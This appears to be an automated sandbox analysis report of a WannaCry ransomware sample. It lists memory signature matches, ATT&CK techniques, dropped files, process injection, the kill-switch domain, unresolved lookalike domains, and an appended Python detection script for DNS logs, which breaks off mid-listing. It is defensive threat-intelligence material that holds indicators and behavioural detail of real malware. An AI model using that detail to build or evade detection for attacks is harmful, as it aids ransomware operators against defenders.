Source: Yara match | File source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.280480248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.780705476.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.780673231.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.270705788.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.277208197.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.282602589.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.780822573.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.353602442.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.780673489.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.282588543.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.353517886.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.277226697.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000000.280846921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.780892179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6360, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winlogon.exe PID: 556, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: lsass.exe PID: 600, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6636, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fontdrvhost.exe PID: 684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 704, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fontdrvhost.exe PID: 900, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: dwm.exe PID: 964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 328, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 384, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1080, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1264, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 1312, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              OS Credential Dumping1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium12
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              Data Encrypted for Impact
              Default Accounts1
              Native API
              4
              Windows Service
              4
              Windows Service
              1
              Obfuscated Files or Information
              LSASS Memory1
              File and Directory Discovery
              Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Command and Scripting Interpreter
              Logon Script (Windows)312
              Process Injection
              1
              Software Packing
              Security Account Manager123
              System Information Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts2
              Service Execution
              Logon Script (Mac)Logon Script (Mac)1
              DLL Side-Loading
              NTDS371
              Security Software Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer2
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script121
              Masquerading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials3
              Process Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items312
              Process Injection
              DCSync1
              Remote System Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Rundll32
              Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Behavior Graph
Behavior Graph ID: 672008
Sample: y2jb4FtSNq
Startdate: 23/07/2022
Architecture: WINDOWS
Score: 100

Graph nodes (node number, label, edge as from->to):
2 Start node (sample y2jb4FtSNq)
56 xyzrpb.com 2->56
58 xgxizm.com 2->58
60 20 other IPs or domains 2->60
74 Tries to download HTTP data from a sinkholed server 2->74
76 Multi AV Scanner detection for domain / URL 2->76
78 Malicious sample detected (through community Yara rule) 2->78
82 8 other signatures 2->82
11 loaddll32.exe 1 2->11 started
13 svchost.exe 2->13 started
16 mssecsvc.exe 2->16 started
18 9 other processes 2->18
80 Tries to resolve many domain names, but no domain seems valid 58->80
21 cmd.exe 1 11->21 started
23 rundll32.exe 11->23 started
26 rundll32.exe 1 11->26 started
96 Changes security center settings (notifications, updates, antivirus, firewall) 13->96
98 Maps a DLL or memory area into another process 16->98
62 127.0.0.1 unknown unknown 18->62
29 rundll32.exe 21->29 started
94 Drops executables to the windows directory (C:\Windows) and starts them 23->94
31 mssecsvc.exe 7 23->31 started
54 C:\Windows\mssecsvc.exe, PE32 26->54 dropped
36 mssecsvc.exe 7 29->36 started
68 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.16.173.80, 49740, 80 CLOUDFLARENETUS United States 31->68
52 C:\Windows\tasksche.exe, PE32 31->52 dropped
70 Drops executables to the windows directory (C:\Windows) and starts them 31->70
40 tasksche.exe 31->40 started
72 Tries to resolve many domain names, but no domain seems valid 68->72
64 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 36->64
66 104.17.244.81, 49772, 80 CLOUDFLARENETUS United States 36->66
84 Antivirus detection for dropped file 36->84
86 Multi AV Scanner detection for dropped file 36->86
88 Machine Learning detection for dropped file 36->88
92 5 other signatures 36->92
42 svchost.exe 36->42 injected
44 winlogon.exe 36->44 injected
46 lsass.exe 36->46 injected
48 15 other processes 36->48
90 Detected Wannacry Ransomware 40->90
50 backgroundTaskHost.exe 50 21 42->50 started

              SourceDetectionScannerLabelLink
              y2jb4FtSNq.dll85%VirustotalBrowse
              y2jb4FtSNq.dll78%MetadefenderBrowse
              y2jb4FtSNq.dll93%ReversingLabsWin32.Ransomware.WannaCry
              y2jb4FtSNq.dll100%AviraW32/Virut.Gen
              y2jb4FtSNq.dll100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Windows\tasksche.exe100%AviraTR/FileCoder.AU
              C:\Windows\mssecsvc.exe100%AviraW32/Virut.Gen
              C:\Windows\tasksche.exe100%Joe Sandbox ML
              C:\Windows\mssecsvc.exe100%Joe Sandbox ML
              C:\Windows\mssecsvc.exe82%MetadefenderBrowse
              C:\Windows\mssecsvc.exe97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Windows\tasksche.exe85%MetadefenderBrowse
              C:\Windows\tasksche.exe95%ReversingLabsWin32.Ransomware.WannaCry
Unpacked PE files (Source | Detection | Scanner | Label)
4.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
12.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
12.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
8.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
31.2.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
8.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
31.0.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.400000.2.unpack | 100% | Avira | W32/Virut.Gen
8.2.mssecsvc.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.7100a4.7.unpack | 100% | Avira | TR/FileCoder.AU
12.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
12.0.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.7100a4.5.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
8.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
4.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
8.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
Domains (Source | Detection | Scanner | Label)
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 12% | Virustotal |
URLs (Source | Detection | Scanner | Label)
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 100% | URL Reputation | malware
http://crl.ver) | 0% | Avira URL Cloud | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 100% | URL Reputation | malware
https://dynamic.t | 0% | URL Reputation | safe
https://www.kryptoslogic.com | 0% | URL Reputation | safe
http://Passport.NET/tb | 0% | Avira URL Cloud | safe
http://www.bingmapsportal.comsv | 0% | URL Reputation | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | 0% | URL Reputation | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80 | true | true | | unknown
tvmwem.com | unknown | unknown | true | | unknown
phirwq.com | unknown | unknown | true | | unknown
liamse.com | unknown | unknown | true | | unknown
otoagh.com | unknown | unknown | true | | unknown
quydys.com | unknown | unknown | true | | unknown
xyzrpb.com | unknown | unknown | true | | unknown
dpoead.com | unknown | unknown | true | | unknown
tgvyjo.com | unknown | unknown | true | | unknown
qavmrl.com | unknown | unknown | true | | unknown
xgxizm.com | unknown | unknown | true | | unknown
bauied.com | unknown | unknown | true | | unknown
glutbe.com | unknown | unknown | true | | unknown
boqbzc.com | unknown | unknown | true | | unknown
joddge.com | unknown | unknown | true | | unknown
hmpjac.com | unknown | unknown | true | | unknown
ihepfj.com | unknown | unknown | true | | unknown
abeaay.com | unknown | unknown | true | | unknown
fosajt.com | unknown | unknown | true | | unknown
trptke.com | unknown | unknown | true | | unknown
wfuinm.com | unknown | unknown | true | | unknown
exiuuy.com | unknown | unknown | true | | unknown
tpmtiw.com | unknown | unknown | true | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | true | URL Reputation: malware | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation)
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://candycrush.king.com/mobile/windows/TileTemplate.xml | svchost.exe, 0000000F.00000000.293803098.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.794537669.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.282252800.000001BC27C69000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000015.00000003.321748674.0000018D75256000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 0000001D.00000002.675684049.00000159FC261000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000015.00000003.321758168.0000018D75241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322285690.0000018D75242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000015.00000002.322305034.0000018D7524D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID | svchost.exe, 00000027.00000000.398010629.000002631E56D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | mssecsvc.exe.2.dr | true | URL Reputation: malware | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000015.00000003.321608478.0000018D75240000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t | svchost.exe, 00000015.00000003.321726134.0000018D75246000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 00000015.00000003.299278941.0000018D75231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322257257.0000018D7523A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.kryptoslogic.com | mssecsvc.exe, 00000008.00000002.351072766.0000000000D50000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
http://www.google.com | svchost.exe, 00000021.00000000.356224558.00000219BE6C3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.788969957.00000219BE6C7000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://Passport.NET/tb | svchost.exe, 00000027.00000002.802385419.000002631E56D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bingmapsportal.comsv | svchost.exe, 00000015.00000002.322158111.0000018D75213000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://activity.windows.com | svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 00000015.00000003.321479826.0000018D7525D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.322356497.0000018D7525E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000015.00000002.322266508.0000018D7523C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | mssecsvc.exe, 00000004.00000002.498964463.000000000019C000.00000004.00000010.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
https://%s.dnet.xboxlive.com | svchost.exe, 00000012.00000002.784717218.000001A4BAC41000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 00000015.00000002.322332492.0000018D7525C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 00000015.00000003.321513280.0000018D7525A000.00000004.00000020.00020000.00000000.sdmp | false | | high
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
104.16.173.80 | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | United States | 13335 | CLOUDFLARENETUS | true
104.17.244.81 | unknown | United States | 13335 | CLOUDFLARENETUS | false

Contacted private IPs
127.0.0.1
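The network indicators above fall into two patterns a detection engineer can act on without the sandbox: one lookup of www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com by mssecsvc.exe that did resolve (to a Cloudflare address, which is how a sinkholed kill-switch domain answers), and 22 six-letter .com names that never resolved at all. The following Python is an added example and is not part of the Joe Sandbox report or its tooling. It runs both checks over a DNS resolution log: the kill-switch lookup is flagged regardless of the answer, because only a running copy of the worm asks for that name, and a per-process burst of distinct NXDOMAIN answers for short random .com names is flagged as the "resolves many domain names, but no domain seems valid" behaviour. The log line format, host names, process paths, timestamps, resolver answers and the two thresholds are constructed assumptions; only the domain names are taken from the report.

```python
"""Added example, not from the Joe Sandbox report: DNS-log detection logic for
(1) a lookup of the WannaCry kill-switch domain and (2) a burst of failed
lookups for short random-looking .com names from a single process.
Log format, hosts, process paths, timestamps, answers and thresholds are
constructed assumptions; the domain names come from the report's tables."""
import re
from collections import defaultdict
from dataclasses import dataclass, asdict

# Domain the report shows mssecsvc.exe contacting.
KILL_SWITCH = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"

# Shape of the unresolved names in the report's domain table: six lowercase
# letters directly under .com (tvmwem.com, phirwq.com, ...).
SHORT_RANDOM_COM = re.compile(r"^[a-z]{6}\.com$")

# Assumed log format, one lookup per line (spaces in process paths not supported):
#   <timestamp> host=<name> image=<process path> query=<fqdn> result=<ip|NXDOMAIN>
LINE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) image=(?P<image>\S+) "
    r"query=(?P<query>\S+) result=(?P<result>\S+)$"
)


@dataclass
class DnsEvent:
    ts: str
    host: str
    image: str
    query: str
    result: str


def parse(lines):
    """Parse log lines into DnsEvent records; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            events.append(DnsEvent(**m.groupdict()))
    return events


def find_kill_switch_lookups(events):
    """Every query for the kill-switch name is an alert on its own, answered or not."""
    return [asdict(e) for e in events
            if e.query.lower().rstrip(".") == KILL_SWITCH]


def find_nxdomain_bursts(events, min_failed=5, min_ratio=0.8):
    """Flag (host, process) pairs whose distinct lookups are dominated by short
    random .com names that all came back NXDOMAIN. min_failed and min_ratio are
    assumed tuning values; set them from the environment's normal NXDOMAIN rate."""
    by_process = defaultdict(list)
    for e in events:
        by_process[(e.host, e.image)].append(e)

    alerts = []
    for (host, image), evs in by_process.items():
        queried = {e.query.lower() for e in evs}
        failed = {e.query.lower() for e in evs
                  if e.result == "NXDOMAIN" and SHORT_RANDOM_COM.match(e.query.lower())}
        ratio = len(failed) / len(queried)
        if len(failed) >= min_failed and ratio >= min_ratio:
            alerts.append({"host": host, "image": image,
                           "failed": len(failed), "total": len(queried),
                           "ratio": round(ratio, 2),
                           "examples": sorted(failed)[:3]})
    return alerts


def triage(lines):
    events = parse(lines)
    return {"kill_switch": find_kill_switch_lookups(events),
            "bursts": find_nxdomain_bursts(events)}


# Constructed sample log (hosts, paths, times and benign lookups are made up).
SAMPLE_LOG = [
    r"2022-07-23T01:44:01Z host=WS01 image=C:\Windows\mssecsvc.exe query=www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com result=104.16.173.80",
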